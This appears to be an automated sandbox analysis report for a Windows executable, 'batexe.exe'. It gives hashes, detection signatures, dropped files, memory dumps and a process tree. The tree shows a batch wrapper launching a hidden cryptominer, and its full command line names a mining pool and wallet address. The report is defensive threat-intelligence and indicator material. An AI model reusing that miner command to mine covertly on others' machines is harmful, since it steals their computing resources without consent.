73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
298s
max time network
306s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
20/02/2024, 04:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3060	b2e.exe
4968	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4968	cpuminer-sse2.exe
4968	cpuminer-sse2.exe
4968	cpuminer-sse2.exe
4968	cpuminer-sse2.exe
4968	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1208-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1208 wrote to memory of 3060	1208	batexe.exe	72
PID 1208 wrote to memory of 3060	1208	batexe.exe	72
PID 1208 wrote to memory of 3060	1208	batexe.exe	72
PID 3060 wrote to memory of 2336	3060	b2e.exe	73
PID 3060 wrote to memory of 2336	3060	b2e.exe	73
PID 3060 wrote to memory of 2336	3060	b2e.exe	73
PID 2336 wrote to memory of 4968	2336	cmd.exe	76
PID 2336 wrote to memory of 4968	2336	cmd.exe	76

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1208
- C:\Users\Admin\AppData\Local\Temp\117F.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\117F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\117F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1A1B.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2336
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\117F.tmp\b2e.exe

Filesize
5.9MB

MD5
bfaa38d240ca7b69b479e015ff2c4299

SHA1
0a82059bfafae34c4d698424990d9861951cacbe

SHA256
4139865bfe808d24824700212febe32c21d71d5d05c51048a403c45b72f168a7

SHA512
883f6e136de5a7c037cfbdd71927574c0d68280dac0f5aa7ef0cddf12dfe8097ebba0dd3a8ed83b85260a69ec20c184110c53bfe6f02e9f936c6203788920b95

Download Submit
C:\Users\Admin\AppData\Local\Temp\117F.tmp\b2e.exe

Filesize
4.9MB

MD5
c2d94e05bcccfa028bff3f1cd9a3a169

SHA1
b7a3b56be0fccf8b7bc6776638b6eeaed502f110

SHA256
e56884187bb8833d4c41bc13e9e63af592a13f56c7f6c026bddfcb9a8bfee198

SHA512
c3dc62d24b39ecfa8b40851df168d8d7412e545b0ff45f19de0d8b487fe3a9c91134bb65b1fe4e03cfa519c6b013d5950103310b12bc641c299a816dafdff09a

Download Submit
C:\Users\Admin\AppData\Local\Temp\1A1B.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
260KB

MD5
1608f63b21cf1623775908be2f6dc316

SHA1
b900ee36bf681326cdbf56bcbec0e6bf7042b4a3

SHA256
623e6daca9ba0bf23420451f51abca5f11c14e506167c3c7291a336c91b2dc79

SHA512
50df8ad3a1dd84d3a0cc6aef3b5911ba859514ea91dce78f5329d64df959e0f4b50ce2f26c19d6fb7cb34d8e0a7f06142e0a50286ef8cf44a49519bb60fb86e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
309KB

MD5
5ce88243d7b946c00ba43b7c9d8bccc7

SHA1
1f2b103d9e5cddb90fda1cbbed24b5674ba48f66

SHA256
bace5b1f4970c62958e6b397befc2477f80cc1db0bd00492295f6af3c37b16c5

SHA512
25bcd89e1ea9c54ae89df643000541338c3bbe21d8d3fdbce10ff08734c04fc23bffc86672f1f5590eed5b258d5e54e6f3cde224e89c3c37b4c63f4764dfeca5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
239KB

MD5
3fb93daf422d16ce3539d1607f8fd143

SHA1
489f97c95ad9f4ccb895c855edd863f7ae36e484

SHA256
c3a215f3668ba7a3daee694427dc95986be9c94a17b5d31b52efc0d14ffa2e87

SHA512
9ec269c860cb6b0af101dd9bfd5e0a165f802e2f3a3610c88e0dd0e75c0159bc2b32cee62fbfef36eb9688e9586657f6b71a47ddfc1f30b1621568f1f3f72d99

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
140KB

MD5
ce7faf574882244efe6b25c25625bc46

SHA1
89121a2585da2f5a0d0673a48cc34a5477de4daf

SHA256
9b49418aa82c85b4731cffd109b5ac8cb07011dec928cb31578cdb43a4038140

SHA512
56577d6c29346466a6f5e872c0f7e3b561cef163539e324878737ab42eaa46144c1dd0182fb606a09557a63aa8adcc5c2a2ed2d1915bdd7afb784aa35cbb7ee5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
56KB

MD5
8925e832fb4f67bf85917c0b4d035453

SHA1
f7693db131465e9ddee0a862b176e8fbb5827a27

SHA256
bdf77bdbc05359a66e60ef96b23df05eaa600229e6d9347372b476fad11618e7

SHA512
f79166ff80b7c43d3567eca072b5f6a536b88210add5e1bbbf2ca3b722969c94732e94293b0ae1d5d4336c834dc964438fec11f2b29c9304f9fa14a455d33954

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
127KB

MD5
0ad183762d6385d16bed6c34180a3193

SHA1
af9aeeda0b2297e640a8555bb5640b599755d63f

SHA256
ba4a72325cb6924bca216a0d8951a0d0305a61eb16be5d0469f3827ad85cee46

SHA512
b1233277ed56bc601497ceda7f3b3787a28c68fbfa82c6c414ce04e7ed40128f0857d08a4b09f84139868cb2f1dc5c50ffb174c59b5f94dae77530540bb35e33

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
120KB

MD5
fb23ae2b7d8f749cc8271772986056f4

SHA1
e72bf03aad5e509545a2ec1f1b464b5ca3920e47

SHA256
239afe6bb5762742003f08832cc238f49600a9252e74dd4e659512d562fdfeb9

SHA512
bc06c417b69cc53abeb0b56b6720b4a58129980528ccbb1eabf7dbdd492f284ce1d025fec64396c26efa305e949715f1b7e458fcba427e09997288eeec89a2ff

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
157KB

MD5
fe013218b8bc0874e3ea20287971f59e

SHA1
8b618a041e5a1a96560af740616ba19d3809798e

SHA256
91dcb1fd087844c35b2981603668ce462ea90dd3fd4f4790c035d9f15f0acecf

SHA512
ac1e8cfde30340366c7e0fc8b5ec4a09a51429bcf9a4aa1875424a40a054171812678a68081d9811778fa9c8928b40ff060f0ee1e876945be0ee073cb1c8332a

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
42KB

MD5
4b2719b01b0a4a91a021a30c69baa2ef

SHA1
a7490212f0d3b17aee6087cb9c56066da222fe76

SHA256
d5bbba38706dea1ff9019ce0cd2a67308614d36cd34d6afc28cdaa7ee3380c2d

SHA512
3dac1ac6e61b90ee8d1563bb4f8cc2970a6a7f91809733977a98ca27a5d0d0674997631c61ffa88029f579deb9d00a7e1b17c61f60a85952d86f68894ca68ccd

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
77KB

MD5
f146ae2716f9b1945d6ba934c6111073

SHA1
d5883e99202e631565a83c5147ed520eba053ebb

SHA256
cbfe168d0c39c4e7d9de029014c3feca9efa5b37ab01d2277ad321ece11e9561

SHA512
6ea3af55d73336c568037e95961edf302f98cc1e64ac24076c2703ec2054905851abf99feaf8ff49da520858429c1971fd5d207fdb86d559ea3a74136445cdc1

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
115KB

MD5
e2e508b572df413734d3e9a7bb65ccd5

SHA1
d41f207b7da438e5f9838318761e584b80f44e50

SHA256
6a0d67e46881de18a7b01b0102f66aa7c7a1433888da350f2e4bf217e8b8cf0d

SHA512
7f1858c386be4a26946451640654457d71bf12d6bf65031c5b8cf0dba4ddb75dd1afe4282a63300659628684f7a4b171d2e8b808189d865eec97a716d8261b2d

Download Submit
memory/1208-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3060-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3060-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4968-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4968-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4968-43-0x0000000074E60000-0x0000000074EF8000-memory.dmp

Filesize
608KB

Download
memory/4968-44-0x0000000001080000-0x0000000002935000-memory.dmp

Filesize
24.7MB

Download
memory/4968-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4968-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4968-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4968-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4968-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4968-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4968-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4968-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4968-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4968-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download